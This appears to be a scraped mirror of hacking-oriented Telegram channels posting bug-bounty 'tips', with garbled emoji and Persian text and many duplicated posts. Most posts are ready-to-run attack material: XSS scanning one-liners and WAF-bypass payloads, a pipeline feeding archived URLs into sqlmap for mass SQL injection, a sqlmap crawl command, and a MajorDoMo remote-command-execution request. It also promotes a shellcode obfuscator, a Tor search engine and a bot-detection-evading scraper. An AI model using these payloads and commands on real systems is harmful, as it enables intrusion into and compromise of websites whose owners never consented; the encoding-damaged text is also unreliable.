xss oneliner command
β¬οΈ Download ( Tools )
π
π
#XSS #BugBounty #Oneliner #Tips
β β β β β β β β β β
π£ T.me/BugCod3
π£ T.me/LearnExploit
echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' | xsschecker -match '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' -vuln
BugCod3
( ZIP )LearnExploit
( BOT )#XSS #BugBounty #Oneliner #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
#Burpsuite #Pro #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
CVE-2024-31497: Critical PuTTY Vulnerability Exposes Private Keys
Link
#cve
βββββββ
0Day.Today
@LearnExploit
@Tech_Army
Link
#cve
βββββββ
0Day.Today
@LearnExploit
@Tech_Army
ΫΩ Ψ³Ψ±Ϊ Ψ§ΩΨ¬ΫΩ Ψ¬Ψ§ΩΨ¨ Ϊ©Ω Ω
ΫΨͺΩΩΫΩ ΨͺΩΨ΄ Ω
Ψ«Ω Ϊ―ΩΪ―Ω Ψ±Ψ§ΫΨͺ Ψ§ΩΎ ΩΨ§ Ω ΩΎΫΩΩΨ― ΩΨ§ Ω .... Ψ±Ω ΩΎΫΨ―Ψ§ Ϊ©ΩΫΨ― π
Link
#writeup #ΩΎΫΨ΄ΩΩΨ§Ψ―Ϋ
βββββββ
0Day.Today
@LearnExploit
@Tech_Army
Link
#writeup #ΩΎΫΨ΄ΩΩΨ§Ψ―Ϋ
βββββββ
0Day.Today
@LearnExploit
@Tech_Army
SQLMap from Waybackurls β‘οΈ
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"
#sql #sql_injection #tip
βββββββ
0Day.Today
@LearnExploit
@Tech_Army
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"
#sql #sql_injection #tip
βββββββ
0Day.Today
@LearnExploit
@Tech_Army
VormWeb - Tor search engine β‘οΈ
volkancfgpi4c7ghph6id2t7vcntenuly66qjt6oedwtjmyj4tkk5oqd.onion
#Tor #Darkweb
βββββββ
0Day.Today
@LearnExploit
@Tech_Army
#Tor #Darkweb
βββββββ
0Day.Today
@LearnExploit
@Tech_Army
MajorDoMo thumb RCE
#rce #Poc #Exploit
βββββββ
0Day.Today
@LearnExploit
@Tech_Army
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23 %3B HTTP/1.1``
#rce #Poc #Exploit
βββββββ
0Day.Today
@LearnExploit
@Tech_Army
Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'
#Fuzz #tip
βββββββ
0Day.Today
@LearnExploit
@Tech_Army
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'
#Fuzz #tip
βββββββ
0Day.Today
@LearnExploit
@Tech_Army
Do you know that sqlmap has its own crawler? Run in the background easily:
sqlmap -u 'https://target\.com' --crawl=3 --random-agent --batch --forms --threads=5 --hostname --timeout=15 --retries=1 --time-sec 12
#sql #sql_injection
βββββββ
0Day.Today
@LearnExploit
@Tech_Army
sqlmap -u 'https://target\.com' --crawl=3 --random-agent --batch --forms --threads=5 --hostname --timeout=15 --retries=1 --time-sec 12
#sql #sql_injection
βββββββ
0Day.Today
@LearnExploit
@Tech_Army
Stored Xss payload π₯
Payload for bypass waf:
<Img Src=OnXSS OnError=confirm("@Learnexploit")>
#xss #Bypass #WAF #Payload
βββββββ
0Day.Today
@LearnExploit
@Tech_Army
Payload for bypass waf:
<Img Src=OnXSS OnError=confirm("@Learnexploit")>
#xss #Bypass #WAF #Payload
βββββββ
0Day.Today
@LearnExploit
@Tech_Army
Xss Payload π
#xss #Payload
βββββββ
0Day.Today
@LearnExploit
@Tech_Army
j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:console.log(location)
#xss #Payload
βββββββ
0Day.Today
@LearnExploit
@Tech_Army
XSS could be be triggers in url itself, no need for parameter injection β‘οΈ
Payloads:
#Xss #Payload
βββββββ
0Day.Today
@LearnExploit
@Tech_Army
Payloads:
%3Csvg%20onload=alert(%22@Learnexploit88%22)%3E
%3Cimg%20src=x%20onerror=alert(%22@Learnexploit%22)%3E
#Xss #Payload
βββββββ
0Day.Today
@LearnExploit
@Tech_Army
π΅οΈββοΈ Human-like Behavior Mimicking: To mimic human-like behavior and avoid detection by anti-bot mechanisms, the tool randomizes user agents for each request. This helps in making the requests appear more natural and reduces the likelihood of being flagged as automated activity.
cd Ominis-Osint
pip install -r requirements.txt
python3 Ominis.py
BugCod3
#Python #Osint #Search #Engin #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
Real fucking shellcode encryptor & obfuscator tool
Github
#tools #shellcode
βββββββ
0Day.Today
@LearnExploit
@Tech_Army
Github
#tools #shellcode
βββββββ
0Day.Today
@LearnExploit
@Tech_Army
311138
#Burpsuite #Pro #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
0Day.Today | Learn Exploit | Zero World | Dark web |
15k beshim ye chi bad sammi darim guys π€«π₯ When we reach 15k, we will publish something awesome (autoexploiter 2024 method).
Post gharar bod dishab upload she, moteasefane developer ye moshkeli barash pish omade zoodi to jibetone , sorry guys π
Forwarded from #Private
https://www.tg-me.com/addlist/_RIe0AhS4NsxZWJk
ΩΩΨ· Ψ¨Ψ§ ΫΩ Ϊ©ΩΫΪ© Ω Ψ¨Ψ―ΩΩ ΩΫΪΪ―ΩΩΩ ΩΨ²ΫΩΩ ΨΉΨΆΩ Ψ΄ΫΨ― Ω Ψ§Ψ² Ϊ©Ψ§ΩΨ§ΩΩΨ§ ΩΨ°Ψͺ Ψ¨Ψ¨Ψ±ΫΨ―
Please open Telegram to view this post
VIEW IN TELEGRAM